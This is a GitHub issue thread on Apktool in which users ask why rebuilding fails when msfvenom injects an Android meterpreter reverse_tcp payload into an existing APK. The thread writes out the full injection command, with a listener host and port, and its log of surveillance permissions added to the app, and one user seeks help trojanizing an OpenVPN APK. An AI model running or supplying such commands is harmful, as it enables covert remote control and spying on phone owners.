### ISSUE TITLE
Error: Unable to rebuild apk with apktool [ MetaSploit ]

### ISSUE THREAD

**Issue by xonexx** [iBotPeaches/Apktool#1934]
### Information
1. **Apktool Version (`apktool -version`)** -2.3.4

2. **Operating System (Mac, Linux, Windows)** - kali linux
3. **APK From? (Playstore, ROM, Other)** - other 

### Stacktrace/Logcat

#msfvenom -x do.apk -p android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4154 -o dh.apk
Using APK template: do.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package org.chromium.webapk.ad8fa96415183e549.ndvph
[*] Loading /tmp/d20181107-4322-1u87t99/original/smali/org/chromium/webapk/shell_apk/MainActivity.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WAKE_LOCK"/>
[*] Adding <uses-permission android:name="android.permission.INTERNET"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Rebuilding do.apk with meterpreter injection as /tmp/d20181107-4322-1u87t99/output.apk
[-] I: Using Apktool 2.3.4
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
W: /tmp/d20181107-4322-1u87t99/original/AndroidManifest.xml:2: error: No resource identifier found for attribute 'compileSdkVersion' in package 'android'
W: 
W: /tmp/d20181107-4322-1u87t99/original/AndroidManifest.xml:2: error: No resource identifier found for attribute 'compileSdkVersionCodename' in package 'android'
W: 
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_6670154149387565673.tmp, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 23, --version-code, 3, --version-name, 3, --no-version-vectors, -F, /tmp/APKTOOL8635579963206062256.tmp, -0, arsc, -0, png, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20181107-4322-1u87t99/original/res, -M, /tmp/d20181107-4322-1u87t99/original/AndroidManifest.xml]
Error: Unable to rebuild apk with apktool

```
Include stacktrace here
```

### Steps to Reproduce
1. `apktool `
 msfvenom -x do.apk -p android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4154 -o dh.apk

### Frameworks
If this APK is from an OEM ROM (Samsung, HTC, LG). Please attach framework files
(`.apks` that live in `/system/framework` or `/system/priv-app`)

### APK
If this APK can be freely shared, please upload/attach a link to it.

### Questions to ask before submission
1. Have you tried `apktool d`, `apktool b` without changing anything? yes
2. If you are trying to install a modified apk, did you resign it? yes
3. Are you using the latest apktool version? 2.3.4

**Comment by iBotPeaches** [comment]
Looks like you have an outdated framework file. Make sure you run `empty-framework-dir` and clear out those old framework resources.

**Comment by dsx12** [comment]
Is there a alternative tool other than apktool to rebuild decompiled apks that successfully works?

I really need to inject payload into original apk, please help. I am not finding any solution to this problem.

**Comment by iBotPeaches** [comment]
@dsx12 There is not. If you find one - let me know. Maybe they can take some of my open bugs. This issue you have reported and it seems spread to various bug trackers is a combination of issues.

1) You need latest Apktool to have the latest AOSP framework file. Otherwise you are forced to pass the updated framework to Apktool. It seems you are up to date. So if you upgraded to a newer Apktool, you might have an old cached previous framework file. That is where `apktool empty-framework-dir` comes into play. It removes those, so the newer version of Apktool running can write a new framework file.

2) context - https://github.com/rapid7/metasploit-framework/issues/11024#issuecomment-441482775
This error reporting has two issues that have been fixed for months. These issues however need to be fixed with aapt2, not aapt1. As of now, you need to opt into aapt2 with the `--use-aapt2` flag during build. Applications originally built with `aapt2` have issues building with the older `aapt1. Attempts have been made to identify what version of `aapt` built an application, but that ticket has been on the back-burner.

So after point 2, there is no bug in metasploit, but perhaps a feature request for msfvenom to use that parameter (`--use-aapt2`) on an optional basis.

The other issues reported on Debian/Kali just don't make sense. People seem to be making up "missing jars" and what not. None of those stacktraces have anything to do with missing jar files. They are about more restrictive applications when building, which loops back to outdated frameworks and aapt1 vs aapt2.

Finally, in this bug report - https://bugs.kali.org/view.php?id=5126. The user has this warning line.

```
W: aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/aapt/linux/aapt (defaulting to $PATH binary)
```

Which means apktool couldn't unpack is own modified version of aapt and thus used the version of aapt that is accessible when referenced directly at cli via "aapt". Who knows if that version is modified to fit the constraints Apktool needs. Maybe the devs/packagers of Debian/Kali know this and unpack the aapt binary directly into `usr/local/bin` or something. You can't run raw copies of aapt/aapt2 from AOSP and expect Apktool to work. Aapt became too restrictive and we need to make shortcuts when rebuilding a disassembled apk - thus we need our aapt binaries.

Hope that helps.

**Comment by dsx12** [comment]
Thanks for the response iBotPeaches. Your work is excellent and this application is fantastic.

Could you give me an example of the command used to use aapt2? I attempted the command:
"apktool b openvpn.original --use-aapt2" to no avail.

Here is my error log:
I: Using Apktool 2.2.2
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building resources...
W: A/        ( 5142): First type is not attr!
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 134): [/tmp/brut_util_Jar_5295261202597449755.tmp, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 27, --version-code, 1503, --version-name, 3.0.5, --no-version-vectors, -F, /tmp/APKTOOL4077269093451678638.tmp, -0, arsc, -0, META-INF/com.android.support_animated-vector-drawable.version, -0, META-INF/com.android.support_appcompat-v7.version, -0, META-INF/com.android.support_support-compat.version, -0, META-INF/com.android.support_support-core-ui.version, -0, META-INF/com.android.support_support-core-utils.version, -0, META-INF/com.android.support_support-fragment.version, -0, META-INF/com.android.support_support-vector-drawable.version, -0, assets/index.bundle.meta, -0, arsc, -I, /home/ghost/.local/share/apktool/framework/1.apk, -S, /home/ghost/Desktop/apks/openvpn.original/res, -M, /home/ghost/Desktop/apks/openvpn.original/AndroidManifest.xml]
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:477)
	at brut.androlib.Androlib.buildResources(Androlib.java:411)
	at brut.androlib.Androlib.build(Androlib.java:310)
	at brut.androlib.Androlib.build(Androlib.java:263)
	at brut.apktool.Main.cmdBuild(Main.java:227)
	at brut.apktool.Main.main(Main.java:84)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 134): [/tmp/brut_util_Jar_5295261202597449755.tmp, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 27, --version-code, 1503, --version-name, 3.0.5, --no-version-vectors, -F, /tmp/APKTOOL4077269093451678638.tmp, -0, arsc, -0, META-INF/com.android.support_animated-vector-drawable.version, -0, META-INF/com.android.support_appcompat-v7.version, -0, META-INF/com.android.support_support-compat.version, -0, META-INF/com.android.support_support-core-ui.version, -0, META-INF/com.android.support_support-core-utils.version, -0, META-INF/com.android.support_support-fragment.version, -0, META-INF/com.android.support_support-vector-drawable.version, -0, assets/index.bundle.meta, -0, arsc, -I, /home/ghost/.local/share/apktool/framework/1.apk, -S, /home/ghost/Desktop/apks/openvpn.original/res, -M, /home/ghost/Desktop/apks/openvpn.original/AndroidManifest.xml]
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:440)
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:463)
	... 5 more
Caused by: brut.common.BrutException: could not exec (exit code = 134): [/tmp/brut_util_Jar_5295261202597449755.tmp, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 27, --version-code, 1503, --version-name, 3.0.5, --no-version-vectors, -F, /tmp/APKTOOL4077269093451678638.tmp, -0, arsc, -0, META-INF/com.android.support_animated-vector-drawable.version, -0, META-INF/com.android.support_appcompat-v7.version, -0, META-INF/com.android.support_support-compat.version, -0, META-INF/com.android.support_support-core-ui.version, -0, META-INF/com.android.support_support-core-utils.version, -0, META-INF/com.android.support_support-fragment.version, -0, META-INF/com.android.support_support-vector-drawable.version, -0, assets/index.bundle.meta, -0, arsc, -I, /home/ghost/.local/share/apktool/framework/1.apk, -S, /home/ghost/Desktop/apks/openvpn.original/res, -M, /home/ghost/Desktop/apks/openvpn.original/AndroidManifest.xml]
	at brut.util.OS.exec(OS.java:95)
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:434)

**Comment by dsx12** [comment]
Could you please provide an example of the --use-aapt2 command?

**Comment by dsx12** [comment]
@iBotPeaches hopefully you will respond xD

**Comment by dsx12** [comment]
@iBotPeaches is there a way to tell which aapt version the apps I decompile use? Thanks for any and all feedback.

**Comment by iBotPeaches** [comment]
@dsx12 It is a parameter when building. 

For detecting what version of aapt, you need to read the resource table and look for sparse resources. aapt1 seems packed. I haven't dug enough to spot any other differences.

**Comment by dsx12** [comment]
Ok so for this APK:
https://www.apk4fun.com/apk/6697/

How would I recompile this be application using apktool? 

I tried searching for resources but I couldn't find them if you wouldn't mind pointing me where the directory or file is that would be magnificent and it would also answer this question for everyone.

**Comment by iBotPeaches** [comment]
I don't think reverse engineering is for you my friend. Take some time and research some things. It is a build parameter and available on the documentation and release notes.

Going to lock this as it was proven not a bug.
